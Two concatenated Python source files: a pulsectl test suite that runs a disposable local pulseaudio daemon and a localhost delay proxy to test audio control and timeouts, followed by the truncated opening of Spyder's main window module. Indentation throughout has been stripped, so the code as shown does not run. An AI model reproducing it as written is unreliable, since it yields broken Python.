test_with_dummy_instance.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import itertools as it, operator as op, functools as ft
import unittest, contextlib, hashlib, atexit, signal, threading, select, errno
import os, sys, io, time, subprocess, tempfile, shutil, socket
if sys.version_info.major > 2: unicode = str
try: import pulsectl
except ImportError:
sys.path.insert(1, os.path.join(__file__, *['..']*2))
import pulsectl
class adict(dict):
def __init__(self, *args, **kws):
super(adict, self).__init__(*args, **kws)
self.__dict__ = self
def start_sock_delay_thread(*args):
# Simple py2/py3 hack to simulate slow network and test conn timeouts
thread = threading.Thread(target=_sock_delay_thread, args=args)
thread.daemon = True
thread.start()
return thread
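# hash_prng below produces a deterministic pseudo-random byte stream by
# repeatedly sha512-hashing its own output; it is used further down to
# generate an audible-noise test wav for the peak-sample test.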
def hash_prng(seed, bs):
n, hash_func = 0, hashlib.sha512
with io.BytesIO() as buff:
while True:
seed = hash_func(seed).digest()
n += buff.write(seed)
if n > bs: return buff.getvalue()
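# _sock_delay_thread is a tiny TCP proxy: it accepts one connection on
# "bind", dials "connect", sleeps up to "delay" seconds, then shuttles
# bytes both ways until ev_done/ev_disco is set - used to emulate a slow
# network link for the connection-timeout tests.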
def _sock_delay_thread(
ev_ready, ev_done, ev_disco, bind, connect, delay, block=0.1 ):
sl = s = c = None
try:
sl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sl.bind(bind)
sl.listen(1)
ev_ready.set()
sl.settimeout(block)
while True:
ev_disco.clear()
while True:
try: s, addr = sl.accept()
except socket.timeout: pass
else: break
if ev_done.is_set(): return
ts0 = time.time()
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(connect)
s.setblocking(False)
c.setblocking(False)
time.sleep(min(delay, max(0, delay - (time.time() - ts0))))
def _send_data(src, dst, bs=8*2**10):
while True:
try:
buff = src.recv(bs)
if not buff: break
dst.sendall(buff) # just assuming it won't get full here
except socket.error as err:
if err.errno != errno.EAGAIN: return True
break
while True:
r,w,x = select.select([s,c], [], [s,c], block)
if x or ev_done.is_set(): return
if ev_disco.is_set(): break
if not (r or x): continue
if c in r and _send_data(c, s): break
if s in r and _send_data(s, c): break
s, c = s.close(), c.close()
finally:
if c: c.close()
if s: s.close()
if sl: sl.close()
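# dummy_pulse_init spins up a throwaway pulseaudio daemon in a private temp
# dir (unless PA_REUSE points at an already-running one), loading null sinks
# plus native-protocol unix/tcp modules on freshly picked localhost ports,
# and starts the delay-proxy thread; dummy_pulse_cleanup tears all of it down.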
def dummy_pulse_init(info=None):
if not info: info = adict(proc=None, tmp_dir=None)
try: _dummy_pulse_init(info)
except Exception:
dummy_pulse_cleanup(info)
raise
return info
def _dummy_pulse_init(info):
# These are to allow starting pulse with debug logging
# or using pre-started (e.g. with gdb attached) instance.
# Note: PA_REUSE is a colon-separated list of four localhost tcp ports for the tcp modules.
# For example:
# t1% env -i XDG_RUNTIME_DIR=/tmp/pulsectl-tests \
# gdb --args /usr/bin/pulseaudio --daemonize=no --fail \
# -nF /tmp/pulsectl-tests/conf.pa --exit-idle-time=-1 --log-level=debug
# t2% PA_TMPDIR=/tmp/pulsectl-tests PA_REUSE=1234:1235:1236:1237 python -m unittest discover
env_tmpdir, env_debug, env_reuse = map(
os.environ.get, ['PA_TMPDIR', 'PA_DEBUG', 'PA_REUSE'] )
if not os.environ.get('PATH'): os.environ['PATH'] = '/usr/local/bin:/usr/bin:/bin'
tmp_base = env_tmpdir or info.get('tmp_dir')
if not tmp_base:
tmp_base = info.tmp_dir = tempfile.mkdtemp(prefix='pulsectl-tests.')
info.sock_unix = None
tmp_base = os.path.realpath(tmp_base)
tmp_path = ft.partial(os.path.join, tmp_base)
# Pick some random available localhost ports
if not info.get('sock_unix'):
bind = (
['127.0.0.1', 0, socket.AF_INET], ['::1', 0, socket.AF_INET6],
['127.0.0.1', 0, socket.AF_INET], ['127.0.0.1', 0, socket.AF_INET] )
for n, spec in enumerate(bind):
if env_reuse:
spec[1] = int(env_reuse.split(':')[n])
continue
addr, p, af = spec
with contextlib.closing(socket.socket(af, socket.SOCK_STREAM)) as s:
s.bind((addr, p))
s.listen(1)
spec[1] = s.getsockname()[1]
info.update(
sock_unix='unix:{}'.format(tmp_path('pulse', 'native')),
sock_tcp4='tcp4:{}:{}'.format(bind[0][0], bind[0][1]),
sock_tcp6='tcp6:[{}]:{}'.format(bind[1][0], bind[1][1]),
sock_tcp_delay='tcp4:{}:{}'.format(bind[2][0], bind[2][1]),
sock_tcp_delay_src=tuple(bind[2][:2]),
sock_tcp_delay_dst=tuple(bind[0][:2]),
sock_tcp_cli=tuple(bind[3][:2]) )
if not info.get('sock_delay_thread'):
ev_ready, ev_exit, ev_disco = (threading.Event() for n in range(3))
delay = info.sock_delay = 0.5
info.sock_delay_thread_ready = ev_ready
info.sock_delay_thread_disco = ev_disco
info.sock_delay_thread_exit = ev_exit
info.sock_delay_thread = start_sock_delay_thread(
ev_ready, ev_exit, ev_disco,
info.sock_tcp_delay_src, info.sock_tcp_delay_dst, delay )
if info.proc and info.proc.poll() is not None: info.proc = None
if not env_reuse and not info.get('proc'):
env = dict(
PATH=os.environ['PATH'], HOME=os.environ['HOME'],
XDG_RUNTIME_DIR=tmp_base, PULSE_STATE_PATH=tmp_base )
proc_stderr = sys.stderr if env_debug else open('/dev/null', 'wb')
info.proc = subprocess.Popen(
[ 'pulseaudio', '--daemonize=no', '--fail',
'-nF', '/dev/stdin', '--exit-idle-time=-1', '--log-level=debug' ], env=env,
stdin=subprocess.PIPE, stderr=proc_stderr )
if proc_stderr is not sys.stderr: proc_stderr.close()
bind4, bind6 = info.sock_tcp4.split(':'), info.sock_tcp6.rsplit(':', 1)
bind4, bind6 = (bind4[1], bind4[2]), (bind6[0].split(':', 1)[1].strip('[]'), bind6[1])
for line in [
'module-augment-properties',
'module-default-device-restore',
'module-always-sink',
'module-intended-roles',
'module-suspend-on-idle',
'module-position-event-sounds',
'module-role-cork',
'module-filter-heuristics',
'module-filter-apply',
'module-switch-on-port-available',
'module-stream-restore',
'module-native-protocol-tcp auth-anonymous=true'
' listen={} port={}'.format(*bind4),
'module-native-protocol-tcp auth-anonymous=true'
' listen={} port={}'.format(*bind6),
'module-native-protocol-unix',
'module-null-sink',
'module-null-sink' ]:
if line.startswith('module-'): line = 'load-module {}'.format(line)
info.proc.stdin.write('{}\n'.format(line).encode('utf-8'))
info.proc.stdin.close()
timeout, checks, p = 4, 10, info.sock_unix.split(':', 1)[-1]
for n in range(checks):
if not os.path.exists(p):
time.sleep(float(timeout) / checks)
continue
break
else:
raise AssertionError( 'pulseaudio process'
' failed to start or create native socket at {}'.format(p) )
def dummy_pulse_cleanup(info=None, proc=None, tmp_dir=None):
if not info: info = adict(proc=proc, tmp_dir=tmp_dir)
if info.proc:
try: info.proc.terminate()
except OSError: pass
timeout, checks = 4, 10
for n in range(checks):
if info.proc.poll() is None:
time.sleep(float(timeout) / checks)
continue
break
else:
try: info.proc.kill()
except OSError: pass
info.proc.wait()
info.proc = None
if info.get('sock_delay_thread'):
info.sock_delay_thread_exit.set()
info.sock_delay_thread = info.sock_delay_thread.join()
if info.tmp_dir:
shutil.rmtree(info.tmp_dir, ignore_errors=True)
info.tmp_dir = None
class DummyTests(unittest.TestCase):
instance_info = proc = tmp_dir = None
@classmethod
def setUpClass(cls):
assert not cls.proc and not cls.tmp_dir, [cls.proc, cls.tmp_dir]
for sig in 'hup', 'term', 'int':
signal.signal(getattr(signal, 'sig{}'.format(sig).upper()), lambda sig,frm: sys.exit())
atexit.register(cls.tearDownClass)
cls.instance_info = dummy_pulse_init()
for k, v in cls.instance_info.items(): setattr(cls, k, v)
@classmethod
def tearDownClass(cls):
if cls.instance_info: dummy_pulse_cleanup(cls.instance_info)
cls.instance_info = cls.proc = cls.tmp_dir = None
# Fuzzy float comparison is necessary for volume values,
# as these lose precision when converted to/from pulse int values.
_compare_floats_rounding = 3
def _compare_floats(self, a, b, msg=None):
if round(a, self._compare_floats_rounding) != round(b, self._compare_floats_rounding):
return self._baseAssertEqual(a, b, msg)
def __init__(self, *args, **kws):
super(DummyTests, self).__init__(*args, **kws)
self.addTypeEqualityFunc(float, self._compare_floats)
def test_enums(self):
enum = pulsectl.PulseEventFacilityEnum
ev_fac_map = dict(sink='sink', sink_input='stream') # hash should match strings
self.assertTrue(ev_fac_map.get(enum.sink))
self.assertTrue(ev_fac_map.get(enum.sink_input))
self.assertEqual(enum.sink, 'sink')
self.assertEqual(enum['sink'], 'sink')
self.assertTrue('sink' in enum)
def test_connect(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse: si = pulse.server_info()
with pulsectl.Pulse('t', server=self.sock_tcp4) as pulse: si4 = pulse.server_info()
self.assertEqual(vars(si), vars(si4))
with pulsectl.Pulse('t', server=self.sock_tcp6) as pulse: si6 = pulse.server_info()
self.assertEqual(vars(si), vars(si6))
def test_connect_timeout(self):
self.sock_delay_thread_ready.wait(timeout=2)
with pulsectl.Pulse('t', server=self.sock_unix) as pulse: si = pulse.server_info()
with pulsectl.Pulse('t', server=self.sock_tcp_delay) as pulse: sid = pulse.server_info()
self.assertEqual(vars(si), vars(sid))
self.sock_delay_thread_disco.set()
with pulsectl.Pulse('t', server=self.sock_tcp_delay, connect=False) as pulse:
pulse.connect()
sid = pulse.server_info()
self.assertEqual(vars(si), vars(sid))
self.sock_delay_thread_disco.set()
with pulsectl.Pulse('t', server=self.sock_tcp_delay, connect=False) as pulse:
pulse.connect(1.0)
sid = pulse.server_info()
self.assertEqual(vars(si), vars(sid))
self.sock_delay_thread_disco.set()
with pulsectl.Pulse('t', server=self.sock_tcp_delay, connect=False) as pulse:
with self.assertRaises(pulsectl.PulseError): pulse.connect(timeout=0.1)
self.sock_delay_thread_disco.set()
pulse.connect(timeout=1.0)
sid = pulse.server_info()
self.assertEqual(vars(si), vars(sid))
self.sock_delay_thread_disco.set()
def test_server_info(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
si, srcs, sinks = pulse.server_info(), pulse.source_list(), pulse.sink_list()
self.assertEqual(len(srcs), 2)
self.assertEqual(len(sinks), 2)
def test_default_set(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
(src1, src2), (sink1, sink2) = pulse.source_list()[:2], pulse.sink_list()[:2]
self.assertNotEqual(sink1.name, sink2.name)
self.assertNotEqual(src1.name, src2.name)
pulse.default_set(sink1)
pulse.default_set(sink1)
pulse.default_set(src1)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink1.name)
self.assertEqual(si.default_source_name, src1.name)
pulse.default_set(sink2)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink2.name)
self.assertEqual(si.default_source_name, src1.name)
pulse.default_set(src2)
pulse.default_set(src2)
pulse.default_set(sink1)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink1.name)
self.assertEqual(si.default_source_name, src2.name)
pulse.sink_default_set(sink2.name)
pulse.source_default_set(src1.name)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink2.name)
self.assertEqual(si.default_source_name, src1.name)
nx = 'xxx'
self.assertNotIn(nx, [sink1.name, sink2.name])
self.assertNotIn(nx, [src1.name, src2.name])
with self.assertRaises(TypeError): pulse.sink_default_set(sink2.index)
with self.assertRaises(pulsectl.PulseOperationFailed): pulse.sink_default_set(nx)
with self.assertRaises(pulsectl.PulseOperationFailed): pulse.source_default_set(nx)
si = pulse.server_info()
self.assertEqual(si.default_sink_name, sink2.name)
self.assertEqual(si.default_source_name, src1.name)
def test_events(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
sink, cb_called = pulse.sink_list()[0], list()
def ev_cb(ev):
self.assertEqual(ev.facility, 'sink')
self.assertEqual(ev.t, 'change')
self.assertEqual(ev.index, sink.index)
cb_called.append(True)
raise pulsectl.PulseLoopStop
pulse.event_mask_set('all')
pulse.event_callback_set(ev_cb)
pulse.volume_set_all_chans(sink, 0.6)
if not cb_called: pulse.event_listen()
self.assertTrue(bool(cb_called))
pulse.event_mask_set('null')
pulse.event_callback_set(None)
def test_cli(self):
xdg_dir_prev = os.environ.get('XDG_RUNTIME_DIR')
try:
os.environ['XDG_RUNTIME_DIR'] = self.tmp_dir
with contextlib.closing(pulsectl.connect_to_cli(as_file=False)) as s:
s.send(b'dump\n')
while True:
try: buff = s.recv(2**20)
except socket.error: buff = None
if not buff: raise AssertionError
if b'### EOF' in buff.splitlines(): break
with contextlib.closing(pulsectl.connect_to_cli()) as s:
s.write('dump\n')
for line in s:
if line == '### EOF\n': break
else: raise AssertionError
s.write(
'load-module module-cli-protocol-tcp'
' listen={} port={}\n'.format(*self.sock_tcp_cli) )
with contextlib.closing(pulsectl.connect_to_cli(self.sock_tcp_cli)) as s:
s.write('dump\n')
for line in s:
if line == '### EOF\n': break
else: raise AssertionError
s.write('unload-module module-cli-protocol-tcp\n')
finally:
if xdg_dir_prev is not None:
os.environ['XDG_RUNTIME_DIR'] = xdg_dir_prev
def test_sink_src(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
src, sink = pulse.source_list()[0], pulse.sink_list()[0]
self.assertTrue(src.proplist.get('device.class'))
self.assertTrue(isinstance(src.proplist.get('device.class'), unicode))
self.assertTrue(isinstance(list(src.proplist.keys())[0], unicode))
self.assertTrue(sink.proplist.get('device.class'))
self.assertTrue(isinstance(sink.proplist.get('device.class'), unicode))
self.assertTrue(isinstance(list(sink.proplist.keys())[0], unicode))
pulse.mute(src, False)
self.assertFalse(src.mute)
self.assertFalse(pulse.source_info(src.index).mute)
pulse.mute(src, True)
pulse.mute(src, True)
self.assertTrue(src.mute)
self.assertTrue(pulse.source_info(src.index).mute)
pulse.mute(src, False)
pulse.mute(sink, False)
self.assertFalse(sink.mute)
self.assertFalse(pulse.sink_info(sink.index).mute)
pulse.mute(sink)
self.assertTrue(sink.mute)
self.assertTrue(pulse.sink_info(sink.index).mute)
pulse.mute(sink, False)
pulse.volume_set_all_chans(sink, 1.0)
self.assertEqual(sink.volume.value_flat, 1.0)
self.assertEqual(pulse.sink_info(sink.index).volume.values, sink.volume.values)
pulse.volume_set_all_chans(sink, 0.5)
self.assertEqual(sink.volume.value_flat, 0.5)
self.assertEqual(pulse.sink_info(sink.index).volume.values, sink.volume.values)
pulse.volume_change_all_chans(sink, -0.5)
self.assertEqual(sink.volume.value_flat, 0.0)
self.assertEqual(pulse.sink_info(sink.index).volume.values, sink.volume.values)
pulse.volume_set_all_chans(sink, 1.0)
def test_get_sink_src(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
src, sink = pulse.source_list(), pulse.sink_list()
src_nx, sink_nx = max(s.index for s in src)+1, max(s.index for s in sink)+1
src, sink = src[0], sink[0]
self.assertEqual(sink.index, pulse.get_sink_by_name(sink.name).index)
self.assertEqual(src.index, pulse.get_source_by_name(src.name).index)
with self.assertRaises(pulsectl.PulseIndexError): pulse.source_info(src_nx)
with self.assertRaises(pulsectl.PulseIndexError): pulse.sink_info(sink_nx)
# def test_get_card(self): no cards to test these calls with :(
def test_module_funcs(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
self.assertEqual(len(pulse.sink_list()), 2)
idx = pulse.module_load('module-null-sink')
self.assertEqual(len(pulse.sink_list()), 3)
pulse.module_unload(idx)
self.assertEqual(len(pulse.sink_list()), 2)
with self.assertRaises(pulsectl.PulseError):
pulse.module_load('module-that-does-not-exist')
self.assertEqual(len(pulse.sink_list()), 2)
def test_stream(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
stream_started = list()
def stream_ev_cb(ev):
if ev.t != 'new': return
stream_started.append(ev.index)
raise pulsectl.PulseLoopStop
pulse.event_mask_set('sink_input')
pulse.event_callback_set(stream_ev_cb)
paplay = subprocess.Popen(
['paplay', '--raw', '/dev/zero'], env=dict(
PATH=os.environ['PATH'], XDG_RUNTIME_DIR=self.tmp_dir ) )
try:
if not stream_started: pulse.event_listen()
self.assertTrue(bool(stream_started))
stream_idx, = stream_started
stream = pulse.sink_input_info(stream_idx)
self.assertTrue(stream.proplist.get('application.name'))
self.assertTrue(isinstance(stream.proplist.get('application.name'), unicode))
self.assertTrue(isinstance(list(stream.proplist.keys())[0], unicode))
pulse.mute(stream, False)
self.assertFalse(stream.mute)
self.assertFalse(pulse.sink_input_info(stream.index).mute)
pulse.mute(stream)
self.assertTrue(stream.mute)
self.assertTrue(pulse.sink_input_info(stream.index).mute)
pulse.mute(stream, False)
pulse.volume_set_all_chans(stream, 1.0)
self.assertEqual(stream.volume.value_flat, 1.0)
self.assertEqual(pulse.sink_input_info(stream.index).volume.values, stream.volume.values)
pulse.volume_set_all_chans(stream, 0.5)
self.assertEqual(stream.volume.value_flat, 0.5)
self.assertEqual(pulse.sink_input_info(stream.index).volume.values, stream.volume.values)
pulse.volume_change_all_chans(stream, -0.5)
self.assertEqual(stream.volume.value_flat, 0.0)
self.assertEqual(pulse.sink_input_info(stream.index).volume.values, stream.volume.values)
finally:
if paplay.poll() is None: paplay.kill()
paplay.wait()
with self.assertRaises(pulsectl.PulseIndexError): pulse.sink_input_info(stream.index)
def test_ext_stream_restore(self):
sr_name1 = 'sink-input-by-application-name:pulsectl-test-1'
sr_name2 = 'sink-input-by-application-name:pulsectl-test-2'
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
self.assertIsNotNone(pulse.stream_restore_test())
pulse.stream_restore_write(sr_name1, volume=0.5, mute=True)
pulse.stream_restore_write(
pulsectl.PulseExtStreamRestoreInfo(sr_name2, volume=0.3, channel_list='mono'),
apply_immediately=True )
sr_list = pulse.stream_restore_list()
self.assertIsInstance(sr_list, list)
self.assertTrue(sr_list)
sr_dict = dict((sr.name, sr) for sr in sr_list)
self.assertEqual(sr_dict[sr_name1].volume.value_flat, 0.5)
self.assertEqual(sr_dict[sr_name1].mute, 1)
self.assertEqual(sr_dict[sr_name1].channel_list, [pulse.channel_list_enum.mono])
self.assertIn(sr_name2, sr_dict)
self.assertEqual(sr_dict[sr_name1].channel_list, [pulse.channel_list_enum.mono])
self.assertEqual(sr_dict[sr_name1].channel_list_raw, [0])
pulse.stream_restore_delete(sr_name1)
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertNotIn(sr_name1, sr_dict)
self.assertIn(sr_name2, sr_dict)
pulse.stream_restore_write(
[ pulsectl.PulseExtStreamRestoreInfo( sr_name1,
volume=0.7, channel_list=['front-left', 'front-right'] ),
sr_dict[sr_name2] ],
mode='merge' )
pulse.stream_restore_write(sr_name1,
volume=0.3, channel_list='mono', mute=True )
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertEqual(sr_dict[sr_name1].volume.value_flat, 0.7)
self.assertEqual(sr_dict[sr_name1].mute, 0)
self.assertEqual( sr_dict[sr_name1].channel_list,
[pulse.channel_list_enum.front_left, pulse.channel_list_enum.front_right] )
self.assertEqual(sr_dict[sr_name1].channel_list_raw, [1, 2])
pulse.stream_restore_write(sr_name1, volume=0.4, mode='replace')
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertEqual(sr_dict[sr_name1].volume.value_flat, 0.4)
pulse.stream_restore_write(sr_name2, volume=0.9, mode='set')
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertEqual(sr_dict[sr_name2].volume.value_flat, 0.9)
self.assertEqual(list(sr_dict.keys()), [sr_name2])
pulse.stream_restore_write([], mode='set') # i.e. remove all
sr_dict = dict((sr.name, sr) for sr in pulse.stream_restore_list())
self.assertNotIn(sr_name1, sr_dict)
self.assertNotIn(sr_name2, sr_dict)
def test_stream_move(self):
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
stream_started = list()
def stream_ev_cb(ev):
if ev.t != 'new': return
stream_started.append(ev.index)
raise pulsectl.PulseLoopStop
pulse.event_mask_set('sink_input')
pulse.event_callback_set(stream_ev_cb)
paplay = subprocess.Popen(
['paplay', '--raw', '/dev/zero'], env=dict(
PATH=os.environ['PATH'], XDG_RUNTIME_DIR=self.tmp_dir ) )
try:
if not stream_started: pulse.event_listen()
stream_idx, = stream_started
stream = pulse.sink_input_info(stream_idx)
sink_indexes = set(s.index for s in pulse.sink_list())
sink1 = stream.sink
sink2 = sink_indexes.difference([sink1]).pop()
sink_nx = max(sink_indexes) + 1
pulse.sink_input_move(stream.index, sink2)
stream_new = pulse.sink_input_info(stream.index)
self.assertEqual(stream.sink, sink1) # old info doesn't get updated
self.assertEqual(stream_new.sink, sink2)
pulse.sink_input_move(stream.index, sink1) # move it back
stream_new = pulse.sink_input_info(stream.index)
self.assertEqual(stream_new.sink, sink1)
with self.assertRaises(pulsectl.PulseOperationFailed):
pulse.sink_input_move(stream.index, sink_nx)
finally:
if paplay.poll() is None: paplay.kill()
paplay.wait()
def test_get_peak_sample(self):
if not os.environ.get('DEV_TESTS'): return # this test seems to be unreliable due to timings
# Note: this test takes at least multiple seconds to run
with pulsectl.Pulse('t', server=self.sock_unix) as pulse:
source_any = max(s.index for s in pulse.source_list())
source_nx = source_any + 1
time.sleep(0.3) # make sure previous streams die
peak = pulse.get_peak_sample(source_any, 0.3)
self.assertEqual(peak, 0)
stream_started = list()
def stream_ev_cb(ev):
if ev.t != 'new': return
stream_started.append(ev.index)
raise pulsectl.PulseLoopStop
pulse.event_mask_set('sink_input')
pulse.event_callback_set(stream_ev_cb)
test_wav = os.path.join(self.tmp_dir, 'test.wav')
with open(test_wav, 'wb') as dst:
dst.write(hash_prng(b'consistent-prng-key-for-audible-noise', 5 * 2**20)) # 5M file
paplay = subprocess.Popen( ['paplay', '--raw', test_wav],
env=dict(PATH=os.environ['PATH'], XDG_RUNTIME_DIR=self.tmp_dir) )
try:
if not stream_started: pulse.event_listen()
stream_idx, = stream_started
si = pulse.sink_input_info(stream_idx)
sink = pulse.sink_info(si.sink)
source = pulse.source_info(sink.monitor_source)
# First poll can randomly fail if too short, probably due to latency or such
peak = pulse.get_peak_sample(sink.monitor_source, 3)
self.assertGreater(peak, 0)
peak = pulse.get_peak_sample(source.index, 0.3, si.index)
self.assertGreater(peak, 0)
peak = pulse.get_peak_sample(source.name, 0.3, si.index)
self.assertGreater(peak, 0)
peak = pulse.get_peak_sample(source_nx, 0.3)
self.assertEqual(peak, 0)
paplay.terminate()
paplay.wait()
peak = pulse.get_peak_sample(source.index, 0.3, si.index)
self.assertEqual(peak, 0)
finally:
if paplay.poll() is None: paplay.kill()
paplay.wait()
class PulseCrashTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
for sig in 'hup', 'term', 'int':
signal.signal(getattr(signal, 'sig{}'.format(sig).upper()), lambda sig,frm: sys.exit())
def test_crash_after_connect(self):
info = dummy_pulse_init()
try:
with pulsectl.Pulse('t', server=info.sock_unix) as pulse:
for si in pulse.sink_list(): self.assertTrue(si)
info.proc.terminate()
info.proc.wait()
with self.assertRaises(pulsectl.PulseOperationFailed):
for si in pulse.sink_list(): raise AssertionError(si)
self.assertFalse(pulse.connected)
finally: dummy_pulse_cleanup(info)
def test_reconnect(self):
info = dummy_pulse_init()
try:
with pulsectl.Pulse('t', server=info.sock_unix, connect=False) as pulse:
with self.assertRaises(Exception):
for si in pulse.sink_list(): raise AssertionError(si)
pulse.connect(autospawn=False)
self.assertTrue(pulse.connected)
for si in pulse.sink_list(): self.assertTrue(si)
info.proc.terminate()
info.proc.wait()
with self.assertRaises(Exception):
for si in pulse.sink_list(): raise AssertionError(si)
self.assertFalse(pulse.connected)
dummy_pulse_init(info)
pulse.connect(autospawn=False, wait=True)
self.assertTrue(pulse.connected)
for si in pulse.sink_list(): self.assertTrue(si)
pulse.disconnect()
with self.assertRaises(Exception):
for si in pulse.sink_list(): raise AssertionError(si)
self.assertFalse(pulse.connected)
pulse.connect(autospawn=False)
self.assertTrue(pulse.connected)
for si in pulse.sink_list(): self.assertTrue(si)
finally: dummy_pulse_cleanup(info)
if __name__ == '__main__': unittest.main()
mainwindow.py
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import re
import shutil
import signal
import socket
import glob
import subprocess
import sys
import threading
import traceback
import importlib
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QDesktopWidget, QDockWidget,
QMainWindow, QMenu, QMessageBox, QShortcut,
QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
import qdarkstyle
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, get_versions, __docs_url__)
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
get_python_doc_path, qt_message_handler,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_image_path, get_module_path,
get_module_source_path, get_safe_mode,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_anaconda, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import (configparser as cp, is_text_string,
PY3, qbytearray_to_str, to_text_string)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.programs import is_module_installed
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri,
MENU_SEPARATOR, qapplication,
set_menu_icons)
from spyder.app.solver import find_external_plugins, solve_plugin_dependencies
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
WinUserEnvDialog = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
from spyder.utils.environ import WinUserEnvDialog
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "https://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "https://matplotlib.org/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"https://www.riverbankcomputing.com/static/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"https://www.riverbankcomputing.com/static/Docs/PyQt5/module_index.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name):
"""
Return a plugin instance by providing the plugin's name.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
raise SpyderAPIError('Plugin "{}" not found!'.format(plugin_name))
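# Illustrative usage only (mirrors the call in tabify_plugin below):
#   console = self.get_plugin(Plugins.Console)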
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
